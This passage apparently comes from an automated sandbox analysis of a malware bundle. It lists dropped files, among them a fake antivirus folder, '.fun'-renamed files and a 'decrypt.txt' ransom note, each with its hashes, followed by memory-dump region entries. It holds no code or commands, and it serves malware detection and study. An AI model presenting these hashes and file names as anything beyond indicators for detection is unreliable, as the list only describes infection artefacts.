      ebd57dd1fc404e98c8706a0d7fb16de9651198f9a6fdfa60cfd2b9618fcf0956

      SHA512

      914fba3aafadc545abf309bc4cc019c833687b63ceb474ccf6a55029fc03bd513a864b4ebc1bc4a03f67fb44a71d315ee5fd7047fcaad2a13f5ecdefd12e5542

    • C:\Users\Admin\AppData\Roaming\AVDefender2011\history.dat

      Filesize

      38B

      MD5

      7feb1957964f0e8cb7ab131e16f601bc

      SHA1

      803b742101dbd4ea28cc4d2919c8d10c948665bd

      SHA256

      2e72a4c2c435d51a51fa2383d6c9d95c8cb00533f426a728caf12512b114ca02

      SHA512

      dd215d69a7ede34e4517665e7a7ec2661e3af4632a2292ffe941d96a1bcb34406316b793256fc2aa0b042e8fa258b1d1a85497f8c337327dcd17db10b438f988

    • C:\Users\Admin\AppData\Roaming\AVDefender2011\result.dat

      Filesize

      170B

      MD5

      fcc223169ce803a4f80884ad7d678d93

      SHA1

      be41298352055e661ccf7361bb27594cc7f41e02

      SHA256

      0d4b7af2582d9e4757fb6aca5d3d79b8f4341fd6d87bdec60a27889a8932a875

      SHA512

      fc6c78b8e2cbe8201076e27368e649b003d347ddc3fc72c2405e3b980da3ddf6a36b7ea9dee6ee324e89a5c3568271e6e8bdd0c17bbb29d60c3d84078f1b8ccb

    • C:\Users\Admin\AppData\Roaming\AVDefender2011\vlc.dat

      Filesize

      4KB

      MD5

      4d6524cc60d4e6a779efa25d9b40aabe

      SHA1

      0aca626e19000d36e8831f5461ad09b90301878d

      SHA256

      d8840438799af4dcfd7a8f29f513365277ff5ee63a4c703e057d37c1fb466fce

      SHA512

      dc3b960ef0ac1f24374af2385870e4d22692723b004e57fd1b72c96eac10520d0e518ca1993c1c9a6dd6479c1c21c74856879a226448d7889c7c663e5dec82d4

    • C:\Users\Admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx

      Filesize

      4.0MB

      MD5

      d572f3c193cbfc88c4f3779657b8e20d

      SHA1

      db07b42317293f2e331c4f34a34fc44abb4c9793

      SHA256

      5e9b4e081abe7439af6fe53489108d8de3d0c9dbc297f080a1cf17e4913fdfd5

      SHA512

      cae95d69f65b13de18908d57186a7fd9c74762152a3e0a51f5031ff029231cffdaf40e69b07c5ecbf812cd8f7c6d2c425abba35ad8fe4567e66a6df949751564

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      769b5f57e23477252ee0cbd8dd16e94c

      SHA1

      23dbd7daccf4390d014749fcf5d0cc9d0258f009

      SHA256

      0940c32503c6d796f115b945b912ead4f528898a100a91ec74b882e458ac02a4

      SHA512

      6cbc7f0b89f0c71adef388c301040ea4806f0c1cddd106d65f25fc7ee3d4bb73ffbe407f210a09425fc4f3f38a48d7bd478bd8eb8e7d0b5edef9b2928c2d223c

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\GIKB7RT5.txt

      Filesize

      476B

      MD5

      1d2dc16cea62fa0db08f9897e7a04cc4

      SHA1

      1e65f8e9a1b82586a87a6548dc833c1b69e406c4

      SHA256

      25158989109bac77548e7726be3a427bf816f4650f3948839fcdd41b26c1b9df

      SHA512

      3f26c180a895997e161b5db9cc17382d23436c27705a4accc72da4ec1a4d28f04fc4d0c304e69380b95b091b77ec4993a60b5eed57d84604ad21a480fd4a860f

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\L6BVWV8L.txt

      Filesize

      1007B

      MD5

      63dba90d47200e3b6b6b790d42acd21b

      SHA1

      aec0e4644d79789213c698f3aba1134b8105367c

      SHA256

      4c55ac116bc3afa529fda75e19eec9ea3696f37d26badfcf96b24c3931c59e31

      SHA512

      37b3a125391f57df5291918d485ddc7d5a5a758a4e0b1ee7a742edfb060af49dc35f22245f3bc6edfd30e18f459066daf57b61e95f6a93fef26f794d1ee1344d

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\VHTXJCHG.txt

      Filesize

      122B

      MD5

      525cb996edffa565d7386b350f358937

      SHA1

      77da62141ed3c5a23b2fc65dfb13c2bab6636f87

      SHA256

      f0828a76ccfde5d890359810139cb9acb583d66299d6a998554ea63a423ad677

      SHA512

      f72ab9527b732d77a3fb7ea5b521ecbe9be1ba6bbbb0cacdce2a49655e091371c99b057189ee84385f017bfc167612d56ddf882871de9d65bb166f77723ba7d4

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\container.dat.fun

      Filesize

      16B

      MD5

      cfdae8214d34112dbee6587664059558

      SHA1

      f649f45d08c46572a9a50476478ddaef7e964353

      SHA256

      33088cb514406f31e3d96a92c03294121ee9f24e176f7062625c2b36bee7a325

      SHA512

      c260f2c223ecbf233051ac1d6a1548ad188a2777085e9d43b02da41b291ff258e4c506f99636150847aa24918c7bbb703652fef2fe55b3f50f85b5bd8dd5f6e3

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      027853b0f473e3d03f16e0e8ec5201bf

      SHA1

      de48752177223873751c4ce877a86213641a2a57

      SHA256

      fd81a6b3dd11147ba0bcff2ac4214745cf15a19946c7c9f8e0c56e1af7df0dae

      SHA512

      201d35f9fa656b1fa4d866e797dd4ef39bcb243ba17c36a86a115daccda35281853ded9fa01d29766fe44959561cc4a8bca5664bdcbbdf2937a9e09215c19e2a

    • C:\Users\Admin\AppData\Roaming\mylfhgizta\InstallParams.lst

      Filesize

      256B

      MD5

      c7977c4a27597b04139e5070e80332ad

      SHA1

      8ccc589fcaf897c30b9a116c2a5147affcaedccf

      SHA256

      fbff74a38cc91aa42a520a4ab6631995822e8b0d6e84b2ec33d2448093b32e21

      SHA512

      f851bf0dd017f7b47fa530f24c2d782c50303adc12b9a836bad356523192a77cdf3c8762835297190b97088e2a7ac3388ff7ca1c26e6b96776ec6408c982df0f

    • C:\Users\Admin\Documents\decrypt.txt

      Filesize

      400B

      MD5

      ac19ccd5e9e68c3eb56db0e9e13bc4b2

      SHA1

      96e8613a918919e99ff6641c24945002f8dbe4b4

      SHA256

      f9be0f6bb237ed35d01bd3354f4848804522691ddb7cfc403024fb4ced030410

      SHA512

      ec11c0acaf1b9bfa4928fd265e284c86a18caa6ba8090f67ea885fec234ce02c94da7b193b61f0a86f40a9c69c903e6fa911c9986560d3492a94b23be64d6782

    • C:\Users\Admin\Documents\decrypt.txt.fun

      Filesize

      416B

      MD5

      2e352a6628f5576b5242ca21a94df75b

      SHA1

      e4fcbb6e5a8074f26447f010d62303ef4dd0d6be

      SHA256

      93f7f4e475d28cf74c0e3bd53ca1bf6344c8e360dd521034d629dbc11b50525b

      SHA512

      34d744ff7447e4bcdaab34350cc94fa7fc731c74420b7217c423c107067ba8840cf38a45e9bfc9caf528038bf8d08d65da7dd764dd00dd8d1f485a70c3e7351c

    • \Users\Admin\AppData\Local\Temp\CollabVM.exe

      Filesize

      863KB

      MD5

      9fb14d31e80a96f0054a324b0971b229

      SHA1

      681a2de46c1859248539d8c5d19e8f1435c13b32

      SHA256

      eaf46bc9bee18096d1236053b7d41279b3b74c7c19d63200daccfdcbaf17b796

      SHA512

      b5638ee712ce077c6324659205534d45f2ce81b13be1b9421cd65d311bd5d84e0fca0fab826a51ba3e2e58c53d9291aacb2bb9061acf7701079e6e536e234add

    • \Users\Admin\AppData\Local\Temp\OMG u guize ROGUEAMP IS A 1337 UTUBEZ haXx0r.exe

      Filesize

      960KB

      MD5

      4a7712b5db89e575ecf3c49846af5553

      SHA1

      0bd8bbe0e7d3c85ca1ffb204bfe3af22d3740955

      SHA256

      cc7c7882b248ba1a75f6103869d63505a339daabcad5400372c2c319db4ec71b

      SHA512

      05db79364f7a4e1b96a90ebca20d0aab0b8a16bcdd5274bb8fd9d9574f5189dae053580c5185884c0cfae4cfd77306c7734ea3cc578417dd97e2668383420d20

    • \Users\Admin\AppData\Local\Temp\yababi.exe

      Filesize

      6.0MB

      MD5

      ca710591543797b655a51b04585e2d58

      SHA1

      d1fb89147c58cb9f73f2e827fd4e6d41940076df

      SHA256

      ec9d392b8a8705a0a510a47e1a4ee3b8785dc87bb2b89b5d6c5eee81e92c11f2

      SHA512

      115ff641cb3b0888c3075decb603003a651dbb04bce79e4be6d4cad09ad4fe03cca9c7327e26a48a7fd8ed42e0fba2c283bc925d4e50635d3a0a0c6c727146c0

    • \Users\Admin\AppData\Roaming\mylfhgizta\kxjus.exe

      Filesize

      912KB

      MD5

      e78afab1c48e3db4f6eeac83c5d7491f

      SHA1

      d117e6198ac31a750f9cdc01e78763e73186d65c

      SHA256

      854b311a73b55e36ea916da96cc497045c2767e532897cbee77c3bc0ed809b07

      SHA512

      4f330db371284a99ace35f6e3f8d30c1657269113d8778110c7316ad91d045109cc16d925073c31839cdafe9a8f8d50ef9a638182fec08ce223b3cf9c5b20cbb

    • memory/324-149-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/324-3460-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/324-95-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/324-152-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/324-150-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/324-148-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/572-259-0x0000000002FF0000-0x00000000031C1000-memory.dmp

      Filesize

      1.8MB

    • memory/572-77-0x0000000000400000-0x00000000005E8000-memory.dmp

      Filesize

      1.9MB

    • memory/572-339-0x0000000002FF0000-0x00000000031C1000-memory.dmp

      Filesize

      1.8MB

    • memory/572-261-0x0000000002FF0000-0x00000000031C1000-memory.dmp

      Filesize

      1.8MB

    • memory/572-260-0x0000000000400000-0x00000000005E8000-memory.dmp

      Filesize

      1.9MB

    • memory/572-248-0x0000000000340000-0x0000000000350000-memory.dmp

      Filesize

      64KB

    • memory/1496-79-0x000007FEF2560000-0x000007FEF29CE000-memory.dmp

      Filesize

      4.4MB

    • memory/1496-267-0x000007FEF2560000-0x000007FEF29CE000-memory.dmp

      Filesize

      4.4MB

    • memory/2108-268-0x0000000000400000-0x00000000005D1000-memory.dmp

      Filesize

      1.8MB

    • memory/2108-363-0x0000000000400000-0x00000000005D1000-memory.dmp

      Filesize

      1.8MB

    • memory/2216-4-0x0000000073F60000-0x000000007450B000-memory.dmp

      Filesize

      5.7MB

    • memory/2216-3-0x0000000073F60000-0x000000007450B000-memory.dmp

      Filesize

      5.7MB

    • memory/2216-2-0x0000000073F61000-0x0000000073F62000-memory.dmp

      Filesize

      4KB

    • memory/2216-5-0x0000000073F60000-0x000000007450B000-memory.dmp

      Filesize

      5.7MB

    • memory/2216-6-0x0000000073F60000-0x000000007450B000-memory.dmp

      Filesize

      5.7MB

    • memory/2232-70-0x0000000003D00000-0x0000000003EE8000-memory.dmp

      Filesize

      1.9MB

    • memory/2232-73-0x0000000003D00000-0x0000000003EE8000-memory.dmp

      Filesize

      1.9MB

    • memory/2348-3000-0x0000000000400000-0x00000000005D1000-memory.dmp

      Filesize

      1.8MB

    • memory/2348-360-0x0000000000400000-0x00000000005D1000-memory.dmp

      Filesize

      1.8MB

    • memory/2348-589-0x0000000000400000-0x00000000005D1000-memory.dmp

      Filesize

      1.8MB

    • memory/2348-2566-0x0000000000400000-0x00000000005D1000-memory.dmp

      Filesize

      1.8MB

    • memory/2348-3003-0x0000000000400000-0x00000000005D1000-memory.dmp

      Filesize

      1.8MB

    • memory/2348-361-0x0000000000400000-0x00000000005D1000-memory.dmp

      Filesize

      1.8MB

    • memory/2348-328-0x0000000006110000-0x0000000006112000-memory.dmp

      Filesize

      8KB

    • memory/2348-3437-0x0000000000400000-0x00000000005D1000-memory.dmp

      Filesize

      1.8MB

    • memory/2348-3439-0x0000000000400000-0x00000000005D1000-memory.dmp

      Filesize

      1.8MB

    • memory/2348-3444-0x0000000000400000-0x00000000005D1000-memory.dmp

      Filesize

      1.8MB

    • memory/2348-3446-0x0000000000400000-0x00000000005D1000-memory.dmp

      Filesize

      1.8MB

    • memory/2348-263-0x0000000000400000-0x00000000005D1000-memory.dmp

      Filesize

      1.8MB

    • memory/2348-368-0x0000000000400000-0x00000000005D1000-memory.dmp

      Filesize

      1.8MB